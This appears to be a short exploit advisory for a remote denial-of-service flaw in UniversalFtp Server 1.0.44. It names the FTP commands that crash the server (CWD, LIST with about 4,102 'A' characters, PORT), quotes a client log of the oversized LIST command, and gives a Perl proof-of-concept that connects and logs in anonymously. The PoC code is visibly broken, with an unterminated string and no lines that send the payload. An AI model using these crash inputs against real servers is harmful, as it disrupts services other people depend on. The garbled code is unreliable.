# UniversalFtp Server 1.0.44 Multiple Remote #Denial of service


[EMAIL PROTECTED] : This bug has been found with a brain , ten fingers, a 
keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more 
tools hint .



# Réponse:      226 Completed...

# Statut:       Liste du répertoire complétée

# Commande :    LIST aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...... ......... 

# Réponse:      150 Directory...

# Statut:       ftpcontrolsocket.cpp(1764): Waiting for replies to skip before 
sending next command...   caller=0p12e69f8  --> 0_o


#functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A) 



# PoC :

use Net::FTP;

(($target = $ARGV[0])) || die "usage:$0 <target> <port>";

my $user = "anonymous";

my $pass = "something";

print "Trying to connect to :$target...\n";

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not 

print "Connected!\n";

$ftp->login($user, $pass);


print "Poc Successfull the server should down now \n";


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